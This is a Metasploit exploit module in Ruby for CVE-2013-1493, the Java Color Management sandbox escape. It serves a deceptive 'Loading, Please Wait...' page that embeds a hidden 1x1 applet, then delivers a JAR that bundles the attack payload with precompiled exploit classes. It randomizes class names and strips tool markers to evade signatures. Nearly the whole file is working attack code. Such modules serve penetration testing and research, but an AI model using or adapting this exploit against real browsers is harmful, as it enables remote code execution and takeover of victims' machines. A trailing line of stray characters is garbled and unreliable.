##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
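# Browser exploit for CVE-2013-1493 (Java CMM / Color Management classes).
#
# The module runs an HTTP server that hands the victim's browser a landing
# page with an <applet> tag and then the applet JAR itself. The JAR bundles
# the Metasploit Java payload with four precompiled exploit classes shipped in
# data/exploits/cve-2013-1493. Click-to-play is NOT bypassed: the user has to
# accept the Java warning before the applet runs.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  # The applet tag alone triggers the bug; no JavaScript is needed on the page.
  autopwn_info({ :javascript => false })

  # Module metadata. 'DefaultTarget' sits with 'Targets' and selects the
  # Windows x86 native payload target (index 1).
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Loads the precompiled exploit classes and randomizes the name of the
  # entry-point class before the HTTP server is started by the superclass.
  def setup
    @init_class           = load_exploit_class('Init.class')
    @leak_class           = load_exploit_class('Leak.class')
    @buffered_image_class = load_exploit_class('MyBufferedImage.class')
    @color_space_class    = load_exploit_class('MyColorSpace.class')

    # The class file is patched in place, so the replacement must be exactly as
    # long as "Init" to leave the file's offsets and length fields intact.
    # NOTE: every occurrence of the byte string "Init" is rewritten, not only
    # the class name; the shipped Init.class is expected to contain no others.
    @init_class_name = rand_text_alpha('Init'.length)
    @init_class.gsub!('Init', @init_class_name)

    super
  end

  # HTTP request dispatcher:
  #   *.jar  -> the applet JAR (payload + exploit classes)
  #   .../   -> the landing page, after (re)generating the payload for this client
  #   other  -> redirect to the resource root
  #
  # @param cli     [Rex::Proto::Http::ServerClient] the connected browser
  # @param request [Rex::Proto::Http::Request] the incoming request
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      send_response(cli, build_jar, { 'Content-Type' => 'application/octet-stream' })
    when /\/$/
      payload = regenerate_payload(cli)
      unless payload
        print_error('Failed to generate the payload.')
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Minimal landing page that embeds the applet. The archive name is random but
  # keeps the .jar suffix so the browser's follow-up request hits the JAR branch
  # of on_request_uri; the code attribute must match the randomized class name
  # chosen in setup.
  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html << %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html << %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html << %Q|</applet></body></html>|
    html
  end

  private

  # Reads one precompiled class file from data/exploits/cve-2013-1493 as raw bytes.
  #
  # @param name [String] file name within the exploit's data directory
  # @return [String] binary (ASCII-8BIT) contents of the class file
  def load_exploit_class(name)
    path = File.join(Msf::Config.install_root, 'data', 'exploits', 'cve-2013-1493', name)
    File.binread(path)
  end

  # Builds the applet JAR from the encoded Java payload plus the exploit classes.
  # The "metasploit" and "Payload" markers in entry names and entry bodies are
  # swapped for random strings of identical length (cheap signature evasion that
  # keeps the class files' internal offsets valid).
  #
  # @return [Rex::Zip::Jar] the JAR with its manifest rebuilt
  def build_jar
    jar = payload.encoded_jar
    jar.add_file("#{@init_class_name}.class", @init_class)
    jar.add_file('Leak.class', @leak_class)
    jar.add_file('MyBufferedImage.class', @buffered_image_class)
    jar.add_file('MyColorSpace.class', @color_space_class)

    metasploit_str = rand_text_alpha('metasploit'.length)
    payload_str    = rand_text_alpha('payload'.length)
    jar.entries.each do |entry|
      entry.name.gsub!('metasploit', metasploit_str)
      entry.name.gsub!('Payload', payload_str)
      entry.data = entry.data.gsub('metasploit', metasploit_str)
      entry.data = entry.data.gsub('Payload', payload_str)
    end

    jar.build_manifest
    jar
  end
end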
- z$ X; k3 K, @7 q |